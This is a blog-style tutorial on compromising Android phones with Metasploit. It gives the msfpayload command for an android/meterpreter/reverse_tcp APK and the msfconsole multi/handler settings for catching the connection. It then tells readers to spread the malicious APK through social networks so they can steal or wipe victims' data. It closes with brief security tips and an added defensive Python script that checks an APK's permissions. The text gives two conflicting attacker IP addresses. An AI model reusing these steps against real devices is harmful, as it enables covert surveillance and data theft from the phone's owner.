Hacking Android Smartphone Tutorial using Metasploit

 



 

As we know, the number of mobile users is increasing day by day, and the security threat is increasing together with the growth of its users. So, at the request of many readers, today I am going to show how to hack an Android smartphone using Metasploit. Why did we choose an Android phone for this tutorial? Simply because Android phones have lately been growing very fast all over the world. The number of Android users is increasing rapidly because of China: China offered Android phones for only US$ 35, which is one of the reasons why Android is growing fast.
If you don't know what Android actually is, see the Wikipedia text about Android below.

What is Android? According to Wikipedia:


Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.

What is APK? According to Wikipedia:

Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.

Now let's start today's tutorial.

Before starting, keep the following in mind. Here is some initial information for this tutorial:

1) Attacker IP address: 192.168.8.94

2) Attacker port to receive connection: 443

Requirements:

1. First, you need the Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)

2. Obviously, you need an Android smartphone (we use LG android 4.4 KitKat)

Step by Step Hacking Android Smartphone Tutorial using Metasploit:

Step 1. First of all, open a terminal. If you don't know how, simply press CTRL + ALT + T.

Step 2. After that, we will use the Metasploit payload framework to create the exploit for this tutorial.

    msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>

The attacker IP address was already described above; here we considered the IP as 182.158.18.67. If you don't understand, please see the picture below.

 

Step 3. Because our payload is reverse_tcp, where the attacker expects the victim to connect back to the attacker machine, the attacker needs to set up a handler for incoming connections on the port already specified above. Go to the Metasploit console; if you don't know how, simply type msfconsole.




Info:

    use exploit/multi/handler -> we will use the Metasploit handler
    set payload android/meterpreter/reverse_tcp -> make sure the payload is the same as in step 2

Step 4. The next step is to configure the switch for the Metasploit payload we already specified in step 3.





Info:

    set lhost 192.168.8.94 -> attacker IP address
    set lport 443 -> port to listen for the reverse connection
    exploit -> start listening for the incoming connection

Step 5. The attacker already has the APK file and will now start distributing it (I don't need to describe how to distribute this file; the internet and social networking sites are good places for distribution).

Step 6. Long story short, the victim (me, myself) downloads the malicious APK file and installs it. After the victim opens the application, the attacker's Metasploit console gets something like this:



Step 7. What does this mean? It means that the attacker is already inside the victim's Android smartphone and can do everything with the victim's phone: he can steal all of the victim's information, and sometimes even destroy all sensitive data on the mobile.



Security tips:

1. Don't install APKs from unknown sources.
2. If you really want to install an APK from an unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK in this tutorial.

3. Always turn off the unknown sources installation feature. Every phone has this feature in the security tab under the mobile settings.
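
To make security tip 2 more concrete, here is an added example (not part of the original post) that looks inside an APK before it is installed: it opens the file as a zip archive, checks for code and JAR-style signature entries, and lists the permissions the manifest requests. The function names, the `SENSITIVE` list and the sample archive are assumptions constructed for this example, and the manifest scan is a string heuristic, not a full parser.

```python
import io
import re
import zipfile

# Permissions that deserve a second look (list chosen for this example).
SENSITIVE = {"READ_SMS", "SEND_SMS", "RECORD_AUDIO", "CAMERA", "READ_CONTACTS"}
PREFIX = b"android.permission."
# Compiled manifests store strings as UTF-8 or UTF-16LE, so scan for both.
UTF8_RE = re.compile(re.escape(PREFIX) + rb"([A-Z_]+)")
UTF16_RE = re.compile(
    b"".join(re.escape(bytes([c])) + b"\x00" for c in PREFIX)
    + rb"((?:[A-Z_]\x00)+)")

def manifest_permissions(manifest: bytes) -> set:
    """Heuristic string scan of a binary AndroidManifest.xml (no full parse)."""
    hits = [m.group(1) for m in UTF8_RE.finditer(manifest)]
    hits += [m.group(1)[::2] for m in UTF16_RE.finditer(manifest)]
    return {h.decode("ascii") for h in hits}

def triage_apk(data: bytes) -> dict:
    """Summarise what an APK (a zip archive) contains and requests."""
    with zipfile.ZipFile(io.BytesIO(data)) as apk:
        names = apk.namelist()
        manifest = (apk.read("AndroidManifest.xml")
                    if "AndroidManifest.xml" in names else b"")
    perms = manifest_permissions(manifest)
    return {
        "has_dex": any(n.endswith(".dex") for n in names),
        # JAR-style (v1) signature blocks; newer schemes are not zip entries.
        "v1_signature_files": sorted(
            n for n in names if n.startswith("META-INF/")
            and n.endswith((".RSA", ".DSA", ".EC"))),
        "permissions": sorted(perms),
        "sensitive": sorted(perms & SENSITIVE),
    }

def build_sample_apk() -> bytes:
    """Constructed stand-in: a zip with a fake manifest blob, not a real app."""
    blob = b"\x03\x00\x08\x00" + b"".join(
        (PREFIX.decode() + p).encode("utf-16-le") + b"\x00\x00"
        for p in ("INTERNET", "READ_SMS", "RECORD_AUDIO"))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", blob)
        z.writestr("classes.dex", b"dex\n035\x00")
    return buf.getvalue()

if __name__ == "__main__":
    print(triage_apk(build_sample_apk()))
```

An app whose stated purpose does not need SMS, microphone or contacts access but still requests it is a reason to stop before installing.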

Copyright © 2012 HacksandCracks All Right Reserved